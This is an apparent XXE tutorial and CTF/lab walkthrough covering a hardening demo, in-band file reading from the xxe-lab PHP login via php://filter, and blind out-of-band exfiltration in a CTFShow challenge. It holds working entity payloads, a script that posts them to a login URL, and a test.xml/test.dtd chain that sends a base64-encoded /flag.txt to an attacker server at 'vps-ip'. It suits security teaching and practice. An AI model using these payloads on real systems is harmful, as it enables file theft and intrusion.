Vulnerability principle
An XXE (XML External Entity) vulnerability occurs when the application parses XML input without disabling the loading of external entities. An attacker-controlled entity declaration then makes the parser fetch an arbitrary external resource, which leads to local file disclosure, server-side requests into the intranet (including port scanning), and, with some parsers and platforms, command execution. XXE is commonly found wherever the application accepts XML from the user, for example an upload point or an API endpoint that takes an XML body, and hands it to the parser without filtering.
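The principle above, as an added example (not code from the page or from the xxe-lab project): Python's xml.sax parser is used as a stand-in for the vulnerable server-side parser, because it can be switched between resolving external general entities and ignoring them. The secret file, the login XML shape and the "TOP-SECRET" content are constructed for the demonstration.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class UsernameCollector(ContentHandler):
    """Collects the text inside <username>, the way a login handler would."""

    def __init__(self):
        super().__init__()
        self.in_username = False
        self.parts = []

    def startElement(self, name, attrs):
        self.in_username = (name == "username")

    def endElement(self, name):
        if name == "username":
            self.in_username = False

    def characters(self, content):
        # Text coming from an expanded external entity arrives here too.
        if self.in_username:
            self.parts.append(content)

    def text(self):
        return "".join(self.parts).strip()


def parse_username(xml_bytes, allow_external_entities):
    """Parse an XML login body and return the username text.

    allow_external_entities=True mirrors a parser that resolves external
    entities (the XXE-vulnerable configuration); False is the hardened
    setting, under which the entity reference expands to nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = UsernameCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo():
    """Parse the same payload twice: once vulnerable, once hardened."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed secret file standing in for e.g. /etc/passwd.
        secret = os.path.join(d, "secret.txt")
        with open(secret, "w", encoding="utf-8") as f:
            f.write("TOP-SECRET")
        # Constructed login body in the <user><username/><password/></user>
        # shape; the entity value is the absolute path of the secret file.
        payload = (
            '<?xml version="1.0"?>\n'
            "<!DOCTYPE user [\n"
            f'<!ENTITY xxe SYSTEM "{secret}">\n'
            "]>\n"
            "<user><username>&xxe;</username><password>x</password></user>"
        ).encode("utf-8")
        leaked = parse_username(payload, allow_external_entities=True)
        safe = parse_username(payload, allow_external_entities=False)
        return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

Disabling external entity resolution is the minimum fix; a parser that rejects any DOCTYPE in untrusted input is the stronger default, since it also removes entity-expansion denial of service.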
Environment setup
Address: https://github.com/c0ny1/xxe-lab
After downloading, put PHP_XXE in the www directory of PHPstudy and open it in the browser.
XXE with echo (in-band)
First capture the login request. The parameters are sent as an XML body, so XML (XXE) injection is possible.
Send the packet to the Repeater module for further analysis.
The response echoes the submitted username, so the expansion of an entity placed in the username field is reflected back. This is used to read files through the XXE vulnerability.
A .txt file can be read directly, but when reading a .php file the code is usually not returned: the <?php ... ?> tags in the file content are interpreted by the XML parser as markup and break the document. The workaround is to have PHP base64-encode the file before it is inserted into the entity, using the php://filter wrapper:
php://filter/read=convert.base64-encode/resource=<file path>
Base64-decoding the echoed value gives the content of abc.php.
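Automating the in-band read described above, as an added example (not the page's or xxe-lab's own code). The request shape (<user><username/><password/></user>) and the response shape (<result><code/><msg/></result>, with the username echoed in <msg>) are assumptions modelled on the login endpoint; the sample PHP file and the sample response are constructed.

```python
import base64
import urllib.request
import xml.etree.ElementTree as ET

# Assumed request body of the login endpoint; the username carries the entity.
PAYLOAD_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource={path}">
]>
<user><username>&xxe;</username><password>x</password></user>"""


def build_payload(path):
    """XXE payload that reads `path` base64-encoded via php://filter."""
    return PAYLOAD_TEMPLATE.format(path=path)


def decode_leak(response_body):
    """Pull the echoed username out of the response and base64-decode it.

    Assumes the server echoes the username inside <msg>; adjust the tag
    name if the target's response differs.
    """
    root = ET.fromstring(response_body)
    msg = root.findtext("msg")
    if msg is None:
        raise ValueError("response did not echo the username")
    return base64.b64decode(msg).decode("utf-8", errors="replace")


def read_file(login_url, path):
    """Send the payload to the login endpoint and return the decoded file."""
    req = urllib.request.Request(
        login_url,
        data=build_payload(path).encode("utf-8"),
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return decode_leak(resp.read().decode("utf-8", errors="replace"))


# Constructed sample: what abc.php might contain, and the response the
# server would send back once the entity has been expanded.
SAMPLE_PHP = "<?php\n$secret = 'constructed example';\n"
SAMPLE_RESPONSE = (
    "<result><code>0</code><msg>%s</msg></result>"
    % base64.b64encode(SAMPLE_PHP.encode("utf-8")).decode("ascii")
)

if __name__ == "__main__":
    print(build_payload("/var/www/html/abc.php"))
    print(decode_leak(SAMPLE_RESPONSE))
```

Without the base64 filter the leaked PHP source would be spliced into the XML as raw markup and the parse would fail, which is why decode_leak works on an encoded value only.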
XXE without echo (blind XXE)
When the web program parses the XML input but does not return the parsed content in the response, this is called blind XXE. The file content cannot be read from the response, so instead the parser is made to fetch an external DTD from a server we control and to send the data to us inside a request (out-of-band exfiltration).
Here is a topic from CTFShow to explain.
https://ctf.show/challenges#web4_%E8%A7%82%E5%BF%83-340
Click for divination and capture the packet. The request fetches an external XML file, so XXE injection is likely.
Because the request is initiated by the target's server on the public internet, the attack chain must be hosted on a server the target can reach (a VPS with a public IP).
First start the Apache service and place the constructed files under /var/www/html so that the target can fetch them.
service apache2 start
Create a test.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!-- %file holds the target file, base64-encoded so that it can be carried in a URL -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt">
<!-- %remote fetches our external DTD, which declares %dtd and %xxe -->
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>
Create a test.dtd
<!-- &#x25; is an escaped %, so xxe is declared as a parameter entity and can be triggered with %xxe; -->
<!-- %file; is expanded into the URL when the target's parser processes this external DTD -->
<!ENTITY % dtd "<!ENTITY &#x25; xxe SYSTEM 'http://vps-ip/pass=%file;'>">
%dtd;
%xxe;
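The out-of-band chain above, generated and harvested by script, as an added example (not code from the page or from CTFShow). The "vps-ip" placeholder is the page's own; the access-log lines and the flag value are constructed, and the 404 on the exfiltration request is expected because /pass=... does not exist on our server.

```python
import base64
import os
import re


def make_test_xml(vps, target="/flag.txt"):
    """test.xml: declares %file (base64 of the target) and pulls in test.dtd."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE test [\n"
        f'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource={target}">\n'
        f'<!ENTITY % remote SYSTEM "http://{vps}/test.dtd">\n'
        "%remote;\n%dtd;\n%xxe;\n]>\n"
    )


def make_test_dtd(vps):
    """test.dtd: &#x25; is an escaped %, so xxe becomes a parameter entity
    whose URL embeds the expansion of %file;."""
    return (
        f"<!ENTITY % dtd \"<!ENTITY &#x25; xxe SYSTEM 'http://{vps}/pass=%file;'>\">\n"
        "%dtd;\n%xxe;\n"
    )


def write_chain(outdir, vps, target="/flag.txt"):
    """Write test.xml and test.dtd into the web root (e.g. /var/www/html)."""
    paths = {}
    for name, body in (("test.xml", make_test_xml(vps, target)),
                       ("test.dtd", make_test_dtd(vps))):
        paths[name] = os.path.join(outdir, name)
        with open(paths[name], "w", encoding="utf-8") as f:
            f.write(body)
    return paths


# The exfiltration request shows up in the Apache access log as
# GET /pass=<base64>; base64 may contain + / = so all three are accepted.
LOG_RE = re.compile(r'"GET /pass=([A-Za-z0-9+/=]+) HTTP')


def recover_from_log(log_text):
    """Return the decoded payloads of every exfiltration request in the log."""
    return [
        base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
        for m in LOG_RE.finditer(log_text)
    ]


# Constructed sample of /var/log/apache2/access.log after the target fired.
SAMPLE_FLAG = "flag{constructed_example}"
SAMPLE_LOG = (
    '203.0.113.5 - - [10/Oct/2023:12:00:00 +0000] "GET /test.dtd HTTP/1.0" 200 122 "-" "-"\n'
    '203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /pass=%s HTTP/1.0" 404 196 "-" "-"\n'
    % base64.b64encode(SAMPLE_FLAG.encode("utf-8")).decode("ascii")
)

if __name__ == "__main__":
    print(make_test_xml("vps-ip"))
    print(make_test_dtd("vps-ip"))
    print(recover_from_log(SAMPLE_LOG))
```

A first request for test.dtd followed by no /pass= request usually means the target parser fetched the DTD but failed on %file (file missing, or base64 disabled); a /pass= request whose value is empty means the filter ran on an unreadable path.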
Then send the request. The target's parser fetches test.dtd, expands %file into the URL and requests http://vps-ip/pass=<base64> from our server; the base64 value appears in the Apache access log (/var/log/apache2/access.log) and decodes to the flag.